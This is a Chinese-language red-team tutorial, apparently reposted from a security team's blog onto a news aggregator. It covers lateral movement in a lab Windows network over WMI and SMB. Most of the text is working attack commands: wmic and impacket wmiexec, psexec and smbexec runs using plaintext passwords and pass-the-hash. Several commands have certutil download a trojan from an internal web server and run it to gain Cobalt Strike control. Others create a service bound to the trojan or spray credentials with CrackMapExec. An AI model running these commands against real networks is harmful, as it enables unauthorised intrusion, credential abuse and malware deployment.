Redian新闻
>
横向移动-WMI、SMB

横向移动-WMI、SMB

科技


WMI

什么是WMI?

WMI是通过135端口进行利用,支持用户名明文或hash的方式进行认证,在使用WMIC执行命令过程中,操作系统默认不会将WMIC的操作记录在日志中,因此在利用过程中不会产生日志。所以越来越多的攻击者开始渐渐使用WMI进行攻击。 

WMI的利用条件

  1. 1. 获得目标机器的用户名和密码

  2. 2. 开放139、445端口

WMIC的使用需要对方开启135端口(有的工具需要445端口)和admin$共享,135端口是WMI默认的管理端口

WMI利用手法

WMI演示环境如下图:

WMIC

系统自带的WMIC命令是单执行,无回显的,并且只支持明文密码,不支持hash进行传递 在这里,我们对SQLserver执行了一个ipconfig的命令,并将结果保存在C盘的ip.txt文件中:

wmic /node:192.168.3.32 /user:administrator /password:admin!@#45 process call create "cmd.exe /c ipconfig > c:\ip.txt

可以看到我们并无法直接看到命令的回显,但我们上帝视角切到靶机发现确实是执行命令了的 。

这里如果在实战中,如果想要查看文件内容和文件是否上传成功的话,就要使用上篇文章内网移动-IPC中的type和dir命令

dir \\192.168.3.32\c$ #列出该主机的C盘下的文件
type \\192.168.3.32\c$\ip.txt 

这里将其上线CS的步骤也是:使用下载命令让其下载Web Server中的木马,执行上线

wmic /node:192.168.3.32 /user:administrator /password:admin!@#45 process call create "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4444.exe c:/4444.exe"  #下载Webserver中的木马文件到自己的C盘

wmic /node:192.168.3.32 /user:administrator /password:admin!@#45 process call create "cmd.exe /c c:/4444.exe" # 执行木马

可以看到此时sqlserver成功被上线。

wmiexec.vbs

wmiexec.vbs 脚本通过 VBS 调用 WMI 来模拟 PsExec 的功能,wmiexec.vbs 下载地址:https://github.com/k8gege/K8tools/blob/master/wmiexec.vbs,交互式,适合在反弹shell或msfconsole中使用,不适合CS控制 首先我们将其上传到跳板机中,然后再使用命令去连接,由于CS无法返回shell的问题,所以该脚本并不适用于在CS中运行,所以这里我选择将会话转移到MSF中去运行。

cscript //nologo wmiexec.vbs /shell 192.168.3.32 administrator admin!@#45

可以看到在MSF中运行了该文件后,成功将sqlserver的shell反弹了过来,在此我们可以直接让其下载后门并执行,上线到我们的CS中。

cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4444.exe c:/4444.exe & C:/4444.exe

可以看到SQLserver成功上线CS

wmiexec-impacket

impacket套件中的wmiexec同样可对WMI进行横向移动,并且支持交互式与单执行,支持hash进行传递,相对来说更为方便,这里直接使用它的py脚本配合socket代理就可以对其内网进行横向移动,避免了上传文件等敏感操作。首先设置好Socket代理,与proxifier的代理与代理规则

配置好socket代理与规则后,就可直接在本机中调用wmiexec.py文件对其内网进行wmi利用

python wmiexec.py ./administrator:[email protected] # 通过明文密码连接获得目标本地用户交互式shell
python wmiexec.py god/administrator:[email protected] # 通过明文密码连接获得目标域用户交互式shell

通过该命令成功获得一个交互式的shell,那么wmiexec.py也可单执行命令。

python wmiexec.py ./administrator:admin!@#[email protected] "whoami"  # 以明文密码连接本地用户并执行命令

python wmiexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./[email protected] "whoami" # 以hash密码连接本地用户并执行命令

这里将目标上线CS的方式和上面一致,通过命令下载木马并执行。

python wmiexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./[email protected] "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4444.exe c:/4444.exe & C:/4444.exe"


SMB

什么是SMB?

SMB(Server Message Block)服务器信息块,它也是一种客户端到服务器的通信协议。除此之外,SMB协议也被称为请求-回复协议。客户端与服务器建立连接后,客户端可以向服务器发送SMB命令允许用户访问共享、打开、读取或者是写入文件

SMB的利用条件

  1. 1. 利用SMB服务可以通过明文或hash传递来远程执行,条件445服务端口开放。

  2. 2. 获得该目标的账号名与密码或hash

    SMB利用手法

    SMB演示环境如下图:

PsExec

官方Psexec

Psexec 是由 Mark Russinovich 创建的 Sysinternals Suite中包含的工具。最初,它旨在作为系统管理员的便利工具,以便他们可以通过在远程主机上运行命令来执行维护任务。后来因为太过方便,被利用到内网渗透之中。下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools,但不支持hash传递,且CS无法利用,而且该工具好像只能在具有桌面权限后才可进行利用,我这里使用msf和反弹shell都无法成功反弹shell.... 这里将psexec.64上传到跳板机中

然后在跳板机桌面中运行该工具,就会反弹出目标机器的shell,如下图所示。

psexec64.exe \\192.168.3.32 -u administrator -p admin!@#45 -s cmd

Impacket-PsExec

还有一个psexec就是我们的impacket套件中的工具,官方psexec有诸多限制,如不支持hash、cs、msf无法利用成功等问题,所以这里选择使用impacket中的psexec工具就相对来说比较灵活,同样,为了避免发送上传文件时数据丢失或被查杀等问题,我们可使用socket+psexec.py对其内网进行横向移动。socket配置此处不再描述,这里直接使用impacket-Psexec.py进行利用

psexec.py ./administrator:admin!@#[email protected] # 通过明文密码连接获得目标本地用户交互式shell
psexec.py god/administrator:[email protected] # 通过明文密码连接获得目标域用户交互式shell

python psexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./[email protected] # 通过哈希密码连接获得目标本地用户交互式shell
python psexec.py -hashes :ccef208c6485269c20db2cad21734fe7 god/[email protected] # 通过哈希密码连接获得目标域用户交互式shell

CS插件-psexec

在我们的CS中其实也有PSEXEC利用功能,且利用较为方便与简单,在targets中选中目标右键即可弹出利用选项,且支持hash的移动

点击psexec64后,就会让我们选择用户名密码与所登录域等,这里我们直接选择之前我们在跳板机中所收集的密码,Domain置空的话为本地用户登录,输入域名后则为域用户登录,选择监听器和会话之后,点击Launch即可。

这里看到Sqlserver成功上线,这里如果想以域用户的身份登录时,Domain处输入域名即为域用户身份登录。

较为简单,这里不做过多讲解。

smbexec-impacket

在impacket中smbexec工具也可以进行移动,该工具利用方式和psexec利用方式相同,这里简单介绍一下即可

python smbexec.py ./administrator:admin!@#[email protected] # 通过明文密码连接获得目标本地用户交互式shell
python smbexec.py -hashes :ccef208c6485269c20db2cad21734fe7 god/[email protected] #通过哈希密码连接获得目标域用户交互式shell

Services

同时还有一个系统自带的服务也可进行利用,该服务支持哈希密码传递,且为单执行无回显,无法交互shell。具体利用过程如下:首先建立SMB连接后,创建一个服务,服务绑定木马,然后在启动该服务,即可上线到CS中

services -hashes :518b98ad4178a53695dc997aa02d455c ./administrator:@192.168.3.32 create -name shell -display shellexec -path C:\4444.exe # 建立SMB连接并创建服务绑定木马
services -hashes :518b98ad4178a53695dc997aa02d455c ./administrator:@192.168.3.32 start -name shell # 启动shell服务

CrackMapExec

在内网渗透中,能获取到主机管理员账号密码,将会使我们横向事半功倍,尤其是在大内网环境中,密码复用率很高,一波喷洒,能助力你拿到一波主机,对拿到的主机再次抓取密码,再用新拿到的密码喷洒一波......,如此反复。密码喷洒的思路就是这样:不断收集内网账号密码,不断去喷洒。这时我们就需要类似CrackMapExec这样的密码喷洒工具,对其内网进行密码喷洒。CrackMapExec下载地址:https://github.com/Porchetta-Industries/CrackMapExec 同样的,CrackMapExec支持本地、域内和明文密文的fuzz,具体利用命令如下:域用户明文密码喷洒:

proxychains crackmapexec smb 192.168.3.21-32 -u dbadmin -p 'Admin12345'

本地用户明文密码喷洒:

proxychains crackmapexec smb 192.168.3.21-32 -u administrator -p 'admin!@#45' --local-auth

域内用户hash密码喷洒

proxychains crackmapexec smb 192.168.3.32 -u dbadmin -H '518b98ad4178a53695dc997aa02d455c'

本地用户hash密码喷洒

proxychains crackmapexec smb 192.168.3.32 -u administrator -H '518b98ad4178a53695dc997aa02d455c' --local-auth

执行命令也是非常的简单,这里直接在上面命令后加上-x 'bash' 即可

proxychains crackmapexec smb 192.168.3.32 -u administrator -H '518b98ad4178a53695dc997aa02d455c' --local-auth -x 'whoami'

当然这里也可以通过已经喷洒出的主机和密码配合CS中的psexec上线到CS中。此处就不再演示。

往期推荐

敏感信息泄露

潮影在线免杀平台上线了

自动化渗透测试工具开发实践

【红蓝对抗】利用CS进行内网横向

一个Go版(更强大)的TideFinger

SRC资产导航监测平台Tsrc上线了

新潮信息-Tide安全团队2022年度总结

记一次实战攻防(打点-Edr-内网-横向-Vcenter)

E

N

D


知识星球产品及服务

团队内部平台:潮汐在线指纹识别平台 | 潮听漏洞情报平台 | 潮巡资产管理与威胁监测平台 | 潮汐网络空间资产测绘 | 潮声漏洞检测平台 | 在线免杀平台 | CTF练习平台 | 物联网固件检测平台 | SRC资产监控平台  | ......


星球分享方向:Web安全 | 红蓝对抗 | 移动安全 | 应急响应 | 工控安全 | 物联网安全 | 密码学 | 人工智能 | ctf 等方面的沟通及分享


星球知识wiki:红蓝对抗 | 漏洞武器库 | 远控免杀 | 移动安全 | 物联网安全 | 代码审计 | CTF | 工控安全 | 应急响应 | 人工智能 | 密码学 | CobaltStrike | 安全测试用例 | ......


星球网盘资料:安全法律法规 | 安全认证资料 | 代码审计 | 渗透安全工具 | 工控安全工具 | 移动安全工具 | 物联网安全 | 其它安全文库合辑  | ......

扫码加入一起学习吧~

微信扫码关注该文公众号作者

戳这里提交新闻线索和高质量文章给我们。
相关阅读
国内首款2K高频PWM柔性屏量产下线Travis Scott x Air Jordan 1 Low OG WMNS 最新配色「Olive」正式登场DSSM、Youtube_DNN、SASRec、PinSAGE…你都掌握了吗?一文总结推荐系统必备经典模型(一)精选Quant岗位 | JP Morgan、高盛、SMBC发布新岗位!中国人更倾向移民日本,可日本房东却不愿卖房给中国人与INSEAD MBA全球招生负责人对谈MBA、录取、职业发展 | AO TalkLinux横向移动手法-CSK靶机年薪47万美金?!MBTA新经理高薪上任,危机重重的MBTA真的可以靠他翻身?路易威登200周年巡回展提前半只脚进前三十! 美国高含金量夏校推荐!(包括:科学、STEM、数学、领导力及综合、创新创业、商科、人文、艺术等)三星、SK海力士……首只可投韩国股票的ETF来了!新上市的中韩半导体ETF有哪些亮点?Offer捷报 l 西北大学Offer+1!UWM学子跨专业圆梦全美TOP3材料科学与工程!开始工作即日起,所有移民中介须向移民局登记备案!SHOWMON 兔女郎SEI:带裸腿+黑丝替换件,XP全满足!DBA学员采访 | 杨文华:EMBA是横向学习,DBA是纵向学习活动预告 | 清华-INSEAD EMBA(TIEMBA)项目介绍及报考说明会我乐见华人对立的政治观点论争iptables实战-DNAT、SNAT和负载均衡转让持有OpenAI、Shein公司股份的基金份额;求购Space X、Neuralink老股|资情留言板第74期來楚生册页小品Offer捷报 l 康奈尔材料科学与工程Offer+1!U.S. News专业排名第8!UWM学子跨专业无G超高难度圆梦藤校!千万富豪股神街头捡破烂,有3套房却睡垃圾堆,绝望中,他向移民美国的妻儿喊话...想申美国MBA连M7,S16都不知道?美国MBA商学院排名解析+M7申请要求横向移动-IPC智慧的体操!CWMS国际象棋新手班火热招生中,免费试课!4-14岁孩子都可以参加!恭喜DBC职梦LSE学员斩获摩根大通(UK) WM实习Offer!唏嘘!千万富豪街头捡破烂,有3套房却睡垃圾堆,绝望中他向移民美国的妻儿喊话UWM站-国际线上暑校课程|旅游&学习 欢乐一夏!精选SDE岗位 | Kaseya、SAP、Square发布最新岗位!丹佛,落基山之城 - 多彩科州之旅(十四)[语法] I like smoking 和 I like to smoke有何区别?德普Amber画上句号?诽谤案宣布和解,Amber赔德普800万降为100万!42条继续生效、边境危险低温 国安部向移民发警告MBTI网图不准?KY来科学解读你的MBTI人格
logo
联系我们隐私协议©2024 redian.news
Redian新闻
Redian.news刊载任何文章,不代表同意其说法或描述,仅为提供更多信息,也不构成任何建议。文章信息的合法性及真实性由其作者负责,与Redian.news及其运营公司无关。欢迎投稿,如发现稿件侵权,或作者不愿在本网发表文章,请版权拥有者通知本网处理。